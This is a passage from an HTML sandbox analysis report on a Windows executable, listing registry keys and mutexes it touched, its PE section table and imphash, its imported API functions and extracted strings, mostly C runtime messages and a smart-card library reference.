HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{475c7950-e3d2-11e0-8d7a-806d6172696f}\<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.bmp<br />
HKEY_CLASSES_ROOT\.bmp<br />
HKEY_CLASSES_ROOT\Paint.Picture<br />
HKEY_CLASSES_ROOT\Paint.Picture\CurVer<br />
HKEY_CLASSES_ROOT\Paint.Picture\<br />
HKEY_CLASSES_ROOT\Paint.Picture\\ShellEx\IconHandler<br />
HKEY_CLASSES_ROOT\SystemFileAssociations\.bmp<br />
HKEY_CLASSES_ROOT\SystemFileAssociations\.bmp\ShellEx\IconHandler<br />
HKEY_CLASSES_ROOT\SystemFileAssociations\image<br />
HKEY_CLASSES_ROOT\SystemFileAssociations\image\ShellEx\IconHandler<br />
HKEY_CLASSES_ROOT\Paint.Picture\\Clsid<br />
HKEY_CLASSES_ROOT\CLSID\{D3E34B21-9D75-101A-8C3D-00AA001A1652}\Implemented Categories\{00021490-0000-0000-C000-000000000046}<br />
HKEY_CLASSES_ROOT\Paint.Picture\\ShellEx\DataHandler<br />
HKEY_CLASSES_ROOT\.bmp\ShellEx\DataHandler<br />
HKEY_CLASSES_ROOT\SystemFileAssociations\.bmp\ShellEx\DataHandler<br />
HKEY_CLASSES_ROOT\SystemFileAssociations\image\ShellEx\DataHandler<br />
HKEY_CLASSES_ROOT\*\ShellEx\DataHandler<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellImageView<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellImageView<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\COM3<br />
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004_Classes<br />
HKEY_LOCAL_MACHINE\Software\Classes<br />
\REGISTRY\USER<br />
HKEY_LOCAL_MACHINE\Software\Classes\CLSID<br />
CLSID\{66E4E4FB-F385-4DD0-8D74-A2EFD1BC6178}<br />
CLSID\{66E4E4FB-F385-4DD0-8D74-A2EFD1BC6178}\TreatAs<br />
\CLSID\{66E4E4FB-F385-4DD0-8D74-A2EFD1BC6178}<br />
\CLSID\{66E4E4FB-F385-4DD0-8D74-A2EFD1BC6178}\InprocServer32<br />
\CLSID\{66E4E4FB-F385-4DD0-8D74-A2EFD1BC6178}\InprocServerX86<br />
\CLSID\{66E4E4FB-F385-4DD0-8D74-A2EFD1BC6178}\LocalServer32<br />
\CLSID\{66E4E4FB-F385-4DD0-8D74-A2EFD1BC6178}\InprocHandler32<br />
\CLSID\{66E4E4FB-F385-4DD0-8D74-A2EFD1BC6178}\InprocHandlerX86<br />
\CLSID\{66E4E4FB-F385-4DD0-8D74-A2EFD1BC6178}\LocalServer<br />
HKEY_CLASSES_ROOT\CLSID\{66E4E4FB-F385-4DD0-8D74-A2EFD1BC6178}<br />
HKEY_CLASSES_ROOT\CLSID\{66E4E4FB-F385-4DD0-8D74-A2EFD1BC6178}\TreatAs<br />
CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}<br />
CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}\TreatAs<br />
\CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}<br />
\CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}\InprocServer32<br />
\CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}\InprocServerX86<br />
\CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}\LocalServer32<br />
\CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}\InprocHandler32<br />
\CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}\InprocHandlerX86<br />
\CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}\LocalServer<br />
HKEY_CLASSES_ROOT\CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}<br />
HKEY_CLASSES_ROOT\CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}\TreatAs<br />
CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}<br />
CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}\TreatAs<br />
\CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}<br />
\CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}\InprocServer32<br />
\CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}\InprocServerX86<br />
\CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}\LocalServer32<br />
\CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}\InprocHandler32<br />
\CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}\InprocHandlerX86<br />
\CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}\LocalServer<br />
HKEY_CLASSES_ROOT\CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}<br />
HKEY_CLASSES_ROOT\CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}\TreatAs<br />
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes<br />
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System<br />
HKEY_CURRENT_USER\Software\Microsoft\Command Processor<br />
</div>
</div>
<div class="tab-pane fade" id="summary_mutexes">
<div class="well mono">
_!MSFTHISTORY!_<br />
c:!documents and settings!user!local settings!temporary internet files!content.ie5!<br />
c:!documents and settings!user!cookies!<br />
c:!documents and settings!user!local settings!history!history.ie5!<br />
WininetStartupMutex<br />
WininetConnectionMutex<br />
WininetProxyRegistryMutex<br />
CTF.TimListCache.FMPDefaultS-1-5-21-1547161642-507921405-839522115-1004MUTEX.DefaultS-1-5-21-1547161642-507921405-839522115-1004<br />
ShimCacheMutex<br />
</div>
</div>
</div>
</div>
</section>


</div>
<div class="tab-pane fade" id="static">
<div class="tabbable tabs">
<ul class="nav nav-pills" style="margin-bottom: 0;">
<li class="active"><a href="#static_analysis_tab" data-toggle="tab">Static Analysis</a></li>
<li><a href="#static_strings_tab" data-toggle="tab">Strings</a></li>
<li><a href="#static_antivirus_tab" data-toggle="tab">Antivirus</a></li>
</ul>
<div class="tab-content">
<div class="tab-pane fade in active" id="static_analysis_tab">
<section id="static_analysis">
<div>
<h4>PE Imphash</h4>
<div class="well">084dd3811114fd1d3f9b5fb02bddd9cc</div>
</div>
<hr />


<div>
<h4>Sections</h4>
<div id="pe_sections">
<table class="table table-striped table-bordered">
<tr>
<th>Name</th>
<th>Virtual Address</th>
<th>Virtual Size</th>
<th>Size of Raw Data</th>
<th>Entropy</th>
</tr>
<tr>
<td>.text</td>
<td>0x00001000</td>
<td>0x0002b585</td>
<td>0x0002c000</td>
<td>6.63120932236</td>
</tr>
<tr>
<td>.rdata</td>
<td>0x0002d000</td>
<td>0x00003c7c</td>
<td>0x00004000</td>
<td>5.31644360797</td>
</tr>
<tr>
<td>.data</td>
<td>0x00031000</td>
<td>0x0000255c</td>
<td>0x00002000</td>
<td>4.15630838234</td>
</tr>
</table>
</div>
</div>
<hr />


<div>
<h4>Imports</h4>
<div id="pe_imports">
<div class="well">
<div><strong>Library USER32.dll</strong>:</div>
<div>&bull; <span class="mono">0x42d15c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SetParent">SetParent</a></span></div>
<div>&bull; <span class="mono">0x42d160 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=UpdateWindow">UpdateWindow</a></span></div>
<div>&bull; <span class="mono">0x42d164 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=EnableMenuItem">EnableMenuItem</a></span></div>
<div>&bull; <span class="mono">0x42d168 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=BeginPaint">BeginPaint</a></span></div>
<div>&bull; <span class="mono">0x42d16c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetFocus">GetFocus</a></span></div>
<div>&bull; <span class="mono">0x42d170 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=MapWindowPoints">MapWindowPoints</a></span></div>
<div>&bull; <span class="mono">0x42d174 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SetWindowTextA">SetWindowTextA</a></span></div>
<div>&bull; <span class="mono">0x42d178 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=EmptyClipboard">EmptyClipboard</a></span></div>
<div>&bull; <span class="mono">0x42d17c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetWindowLongA">GetWindowLongA</a></span></div>
<div>&bull; <span class="mono">0x42d180 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SendMessageA">SendMessageA</a></span></div>
<div>&bull; <span class="mono">0x42d184 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=LoadIconA">LoadIconA</a></span></div>
<div>&bull; <span class="mono">0x42d188 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SetMenuItemInfoW">SetMenuItemInfoW</a></span></div>
<div>&bull; <span class="mono">0x42d18c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SetRectEmpty">SetRectEmpty</a></span></div>
<div>&bull; <span class="mono">0x42d190 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetDCEx">GetDCEx</a></span></div>
<div>&bull; <span class="mono">0x42d194 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=DrawFocusRect">DrawFocusRect</a></span></div>
<div>&bull; <span class="mono">0x42d198 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetCursorPos">GetCursorPos</a></span></div>
<div>&bull; <span class="mono">0x42d19c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetDlgItemInt">GetDlgItemInt</a></span></div>
<div>&bull; <span class="mono">0x42d1a0 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=TranslateMessage">TranslateMessage</a></span></div>
<div>&bull; <span class="mono">0x42d1a4 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=LoadStringW">LoadStringW</a></span></div>
<div>&bull; <span class="mono">0x42d1a8 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=ShowWindowAsync">ShowWindowAsync</a></span></div>
<div>&bull; <span class="mono">0x42d1ac <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=CreateWindowExA">CreateWindowExA</a></span></div>
<div>&bull; <span class="mono">0x42d1b0 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=ChildWindowFromPoint">ChildWindowFromPoint</a></span></div>
<div>&bull; <span class="mono">0x42d1b4 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=IsChild">IsChild</a></span></div>
<div>&bull; <span class="mono">0x42d1b8 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=ReleaseDC">ReleaseDC</a></span></div>
<div>&bull; <span class="mono">0x42d1bc <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SetCursor">SetCursor</a></span></div>
<div>&bull; <span class="mono">0x42d1c0 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SetRect">SetRect</a></span></div>
<div>&bull; <span class="mono">0x42d1c4 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=MessageBoxW">MessageBoxW</a></span></div>
<div>&bull; <span class="mono">0x42d1c8 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetDC">GetDC</a></span></div>
</div>
<div class="well">
<div><strong>Library KERNEL32.dll</strong>:</div>
<div>&bull; <span class="mono">0x42d000 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetStartupInfoW">GetStartupInfoW</a></span></div>
<div>&bull; <span class="mono">0x42d004 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=CompareStringW">CompareStringW</a></span></div>
<div>&bull; <span class="mono">0x42d008 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=CompareStringA">CompareStringA</a></span></div>
<div>&bull; <span class="mono">0x42d00c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetTimeZoneInformation">GetTimeZoneInformation</a></span></div>
<div>&bull; <span class="mono">0x42d010 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetLocaleInfoW">GetLocaleInfoW</a></span></div>
<div>&bull; <span class="mono">0x42d014 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=HeapSize">HeapSize</a></span></div>
<div>&bull; <span class="mono">0x42d018 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=LCMapStringW">LCMapStringW</a></span></div>
<div>&bull; <span class="mono">0x42d01c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=WideCharToMultiByte">WideCharToMultiByte</a></span></div>
<div>&bull; <span class="mono">0x42d020 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=LCMapStringA">LCMapStringA</a></span></div>
<div>&bull; <span class="mono">0x42d024 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetStringTypeW">GetStringTypeW</a></span></div>
<div>&bull; <span class="mono">0x42d028 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetStringTypeA">GetStringTypeA</a></span></div>
<div>&bull; <span class="mono">0x42d02c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=IsValidCodePage">IsValidCodePage</a></span></div>
<div>&bull; <span class="mono">0x42d030 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=IsValidLocale">IsValidLocale</a></span></div>
<div>&bull; <span class="mono">0x42d034 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=EnumSystemLocalesA">EnumSystemLocalesA</a></span></div>
<div>&bull; <span class="mono">0x42d038 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetLocaleInfoA">GetLocaleInfoA</a></span></div>
<div>&bull; <span class="mono">0x42d03c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetUserDefaultLCID">GetUserDefaultLCID</a></span></div>
<div>&bull; <span class="mono">0x42d040 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetDateFormatA">GetDateFormatA</a></span></div>
<div>&bull; <span class="mono">0x42d044 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetTimeFormatA">GetTimeFormatA</a></span></div>
<div>&bull; <span class="mono">0x42d048 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=HeapReAlloc">HeapReAlloc</a></span></div>
<div>&bull; <span class="mono">0x42d04c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=InitializeCriticalSection">InitializeCriticalSection</a></span></div>
<div>&bull; <span class="mono">0x42d050 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=InterlockedExchange">InterlockedExchange</a></span></div>
<div>&bull; <span class="mono">0x42d054 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SetConsoleCtrlHandler">SetConsoleCtrlHandler</a></span></div>
<div>&bull; <span class="mono">0x42d058 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetOEMCP">GetOEMCP</a></span></div>
<div>&bull; <span class="mono">0x42d05c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetACP">GetACP</a></span></div>
<div>&bull; <span class="mono">0x42d060 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetCPInfo">GetCPInfo</a></span></div>
<div>&bull; <span class="mono">0x42d064 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=FatalAppExitA">FatalAppExitA</a></span></div>
<div>&bull; <span class="mono">0x42d068 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=IsDebuggerPresent">IsDebuggerPresent</a></span></div>
<div>&bull; <span class="mono">0x42d06c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=RaiseException">RaiseException</a></span></div>
<div>&bull; <span class="mono">0x42d070 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SetUnhandledExceptionFilter">SetUnhandledExceptionFilter</a></span></div>
<div>&bull; <span class="mono">0x42d074 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetEnvironmentStrings">GetEnvironmentStrings</a></span></div>
<div>&bull; <span class="mono">0x42d078 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetCurrentThread">GetCurrentThread</a></span></div>
<div>&bull; <span class="mono">0x42d07c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=VirtualAlloc">VirtualAlloc</a></span></div>
<div>&bull; <span class="mono">0x42d080 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetVersionExA">GetVersionExA</a></span></div>
<div>&bull; <span class="mono">0x42d084 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetProcAddress">GetProcAddress</a></span></div>
<div>&bull; <span class="mono">0x42d088 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=LoadLibraryA">LoadLibraryA</a></span></div>
<div>&bull; <span class="mono">0x42d08c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=FreeLibrary">FreeLibrary</a></span></div>
<div>&bull; <span class="mono">0x42d090 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetModuleFileNameA">GetModuleFileNameA</a></span></div>
<div>&bull; <span class="mono">0x42d094 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=lstrlenW">lstrlenW</a></span></div>
<div>&bull; <span class="mono">0x42d098 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=HeapAlloc">HeapAlloc</a></span></div>
<div>&bull; <span class="mono">0x42d09c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=CloseHandle">CloseHandle</a></span></div>
<div>&bull; <span class="mono">0x42d0a0 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=MultiByteToWideChar">MultiByteToWideChar</a></span></div>
<div>&bull; <span class="mono">0x42d0a4 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=EnterCriticalSection">EnterCriticalSection</a></span></div>
<div>&bull; <span class="mono">0x42d0a8 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetCurrentProcess">GetCurrentProcess</a></span></div>
<div>&bull; <span class="mono">0x42d0ac <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=FindFirstFileW">FindFirstFileW</a></span></div>
<div>&bull; <span class="mono">0x42d0b0 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetStdHandle">GetStdHandle</a></span></div>
<div>&bull; <span class="mono">0x42d0b4 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=CreateFileA">CreateFileA</a></span></div>
<div>&bull; <span class="mono">0x42d0b8 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=LocalFree">LocalFree</a></span></div>
<div>&bull; <span class="mono">0x42d0bc <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetVersionExW">GetVersionExW</a></span></div>
<div>&bull; <span class="mono">0x42d0c0 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetCommandLineW">GetCommandLineW</a></span></div>
<div>&bull; <span class="mono">0x42d0c4 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=CreateEventW">CreateEventW</a></span></div>
<div>&bull; <span class="mono">0x42d0c8 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=LeaveCriticalSection">LeaveCriticalSection</a></span></div>
<div>&bull; <span class="mono">0x42d0cc <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=HeapDestroy">HeapDestroy</a></span></div>
<div>&bull; <span class="mono">0x42d0d0 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=Sleep">Sleep</a></span></div>
<div>&bull; <span class="mono">0x42d0d4 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=TerminateProcess">TerminateProcess</a></span></div>
<div>&bull; <span class="mono">0x42d0d8 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=RtlUnwind">RtlUnwind</a></span></div>
<div>&bull; <span class="mono">0x42d0dc <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=HeapFree">HeapFree</a></span></div>
<div>&bull; <span class="mono">0x42d0e0 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetProcessHeap">GetProcessHeap</a></span></div>
<div>&bull; <span class="mono">0x42d0e4 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SetEnvironmentVariableA">SetEnvironmentVariableA</a></span></div>
<div>&bull; <span class="mono">0x42d0e8 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetModuleHandleA">GetModuleHandleA</a></span></div>
<div>&bull; <span class="mono">0x42d0ec <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=TlsGetValue">TlsGetValue</a></span></div>
<div>&bull; <span class="mono">0x42d0f0 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=TlsAlloc">TlsAlloc</a></span></div>
<div>&bull; <span class="mono">0x42d0f4 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=TlsSetValue">TlsSetValue</a></span></div>
<div>&bull; <span class="mono">0x42d0f8 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=TlsFree">TlsFree</a></span></div>
<div>&bull; <span class="mono">0x42d0fc <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=InterlockedIncrement">InterlockedIncrement</a></span></div>
<div>&bull; <span class="mono">0x42d100 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SetLastError">SetLastError</a></span></div>
<div>&bull; <span class="mono">0x42d104 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetCurrentThreadId">GetCurrentThreadId</a></span></div>
<div>&bull; <span class="mono">0x42d108 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetLastError">GetLastError</a></span></div>
<div>&bull; <span class="mono">0x42d10c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=InterlockedDecrement">InterlockedDecrement</a></span></div>
<div>&bull; <span class="mono">0x42d110 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=ExitProcess">ExitProcess</a></span></div>
<div>&bull; <span class="mono">0x42d114 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=WriteFile">WriteFile</a></span></div>
<div>&bull; <span class="mono">0x42d118 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=UnhandledExceptionFilter">UnhandledExceptionFilter</a></span></div>
<div>&bull; <span class="mono">0x42d11c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetModuleFileNameW">GetModuleFileNameW</a></span></div>
<div>&bull; <span class="mono">0x42d120 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=FreeEnvironmentStringsA">FreeEnvironmentStringsA</a></span></div>
<div>&bull; <span class="mono">0x42d124 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=FreeEnvironmentStringsW">FreeEnvironmentStringsW</a></span></div>
<div>&bull; <span class="mono">0x42d128 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetEnvironmentStringsW">GetEnvironmentStringsW</a></span></div>
<div>&bull; <span class="mono">0x42d12c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetCommandLineA">GetCommandLineA</a></span></div>
<div>&bull; <span class="mono">0x42d130 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=SetHandleCount">SetHandleCount</a></span></div>
<div>&bull; <span class="mono">0x42d134 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetFileType">GetFileType</a></span></div>
<div>&bull; <span class="mono">0x42d138 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetStartupInfoA">GetStartupInfoA</a></span></div>
<div>&bull; <span class="mono">0x42d13c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=DeleteCriticalSection">DeleteCriticalSection</a></span></div>
<div>&bull; <span class="mono">0x42d140 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=HeapCreate">HeapCreate</a></span></div>
<div>&bull; <span class="mono">0x42d144 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=VirtualFree">VirtualFree</a></span></div>
<div>&bull; <span class="mono">0x42d148 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=QueryPerformanceCounter">QueryPerformanceCounter</a></span></div>
<div>&bull; <span class="mono">0x42d14c <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetTickCount">GetTickCount</a></span></div>
<div>&bull; <span class="mono">0x42d150 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetCurrentProcessId">GetCurrentProcessId</a></span></div>
<div>&bull; <span class="mono">0x42d154 <a href="http://social.msdn.microsoft.com/Search/en-US/windows/desktop?query=GetSystemTimeAsFileTime">GetSystemTimeAsFileTime</a></span></div>
</div>
</div>
</div>
<hr />

</section>

</div>
<div class="tab-pane fade" id="static_strings_tab">
<section id="static_strings">
<div class="well" style="font-family: monospace;">
<div>!This program cannot be run in DOS mode.</div>
<div>`.rdata</div>
<div>@.data</div>
<div>QQSVWd</div>
<div>;t$,v-</div>
<div>UQPXY]Y[</div>
<div>HtHu4j</div>
<div>s[S;7|G;w</div>
<div>tR99u2</div>
<div>tehsgA</div>
<div>YYuTVWhO{A</div>
<div>&gt;=Yt/j</div>
<div>4~f9.u</div>
<div>QQSVWh</div>
<div>@@f98u</div>
<div>@@f98u</div>
<div>j(j ^V</div>
<div>F9=44C</div>
<div>Wto=@&amp;C</div>
<div>t^9(uZ</div>
<div>tD9(u@</div>
<div>Y9&gt;t7j</div>
<div>0A@@Ju</div>
<div>YYu-9D$</div>
<div>_VVVVV</div>
<div>_VVVVV</div>
<div>zukSSS</div>
<div>0SSSSS</div>
<div>0SSSSS</div>
<div>0SSSSS</div>
<div>0WWWWW</div>
<div>BBFFf;</div>
<div>URPQQh@</div>
<div>v$;5d&amp;C</div>
<div>C PjPV</div>
<div>C$PjQV</div>
<div>C*PjTV</div>
<div>C+PjUV</div>
<div>C,PjVV</div>
<div>C-PjWV</div>
<div>C.PjRV</div>
<div>C/PjSV</div>
<div>.;1s(N</div>
<div>HHt4HHt</div>
<div>Ht`Ht,</div>
<div>teHtFHt&amp;Hu</div>
<div>ty&lt;%tA</div>
<div>PPPPPPPP</div>
<div>u|Vj@h</div>
<div>t.8t*W</div>
<div>PPPPPPPP</div>
<div>u,VVWV</div>
<div>JJt&amp;JJt</div>
<div>&lt;0|&lt;9</div>
<div>tK&lt;_t&lt;&lt;$t8&lt;&lt;t4&lt;&gt;t0&lt;-t,&lt;a|</div>
<div>&lt;z~$&lt;A|</div>
<div>&lt;0|I&lt;9</div>
<div>t^&lt;A|f&lt;P</div>
<div>WQt)9E</div>
<div>tP&lt;@tF&lt;Zt</div>
<div>th&lt;@tdj&#39;</div>
<div>EhPWje</div>
<div>Nt@Nt NuM</div>
<div>!Mh!MXV3</div>
<div>!MX8]x</div>
<div>j@h$3C</div>
<div>t.&lt;@t5V</div>
<div>TtSHtIHt?Ht</div>
<div>bj@h$3C</div>
<div>AtIHt0Hu</div>
<div>t}&lt;?tH&lt;Xt</div>
<div>^SSSSS</div>
<div>^SSSSS</div>
<div>0WhD3C</div>
<div>&gt;:u8FV</div>
<div>.VVVVVSRSSj</div>
<div>VVVVVj</div>
<div>^SSSSS</div>
<div>^SSSSS</div>
<div>0SSSSS</div>
<div>t+WWVPV</div>
<div>^SSSSS</div>
<div>^WWWWW</div>
<div>0SSSSS</div>
<div>8VVVVV</div>
<div>tb9} u</div>
<div>YYt\VV</div>
<div>YYt SVW</div>
<div>SR_Close - begin Critical Section failed</div>
<div>winscard.dll</div>
<div>SCardIntroduceReaderW</div>
<div>CRAD_STATE_DISCONNECTED</div>
<div>bad allocation</div>
<div>bad exception</div>
<div>EncodePointer</div>
<div>KERNEL32.DLL</div>
<div>DecodePointer</div>
<div>FlsFree</div>
<div>FlsSetValue</div>
<div>FlsGetValue</div>
<div>FlsAlloc</div>
<div>CorExitProcess</div>
<div>mscoree.dll</div>
<div>runtime error </div>
<div>TLOSS error</div>
<div>SING error</div>
<div>DOMAIN error</div>
<div>An application has made an attempt to load the C runtime library incorrectly.</div>
<div>Please contact the application&#39;s support team for more information.</div>
<div>- Attempt to use MSIL code from this assembly during native code initialization</div>
<div>This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.</div>
<div>- not enough space for locale information</div>
<div>- Attempt to initialize the CRT more than once.</div>
<div>This indicates a bug in your application.</div>
<div>- CRT not initialized</div>
<div>- unable to initialize heap</div>
<div>- not enough space for lowio initialization</div>
<div>- not enough space for stdio initialization</div>
<div>- pure virtual function call</div>
<div>- not enough space for _onexit/atexit table</div>
<div>- unable to open console device</div>
<div>- unexpected heap error</div>
<div>- unexpected multithread lock error</div>
<div>- not enough space for thread data</div>
<div>This application has requested the Runtime to terminate it in an unusual way.</div>
<div>Please contact the application&#39;s support team for more information.</div>
<div>- not enough space for environment</div>
<div>- not enough space for arguments</div>
<div>- floating point not loaded</div>
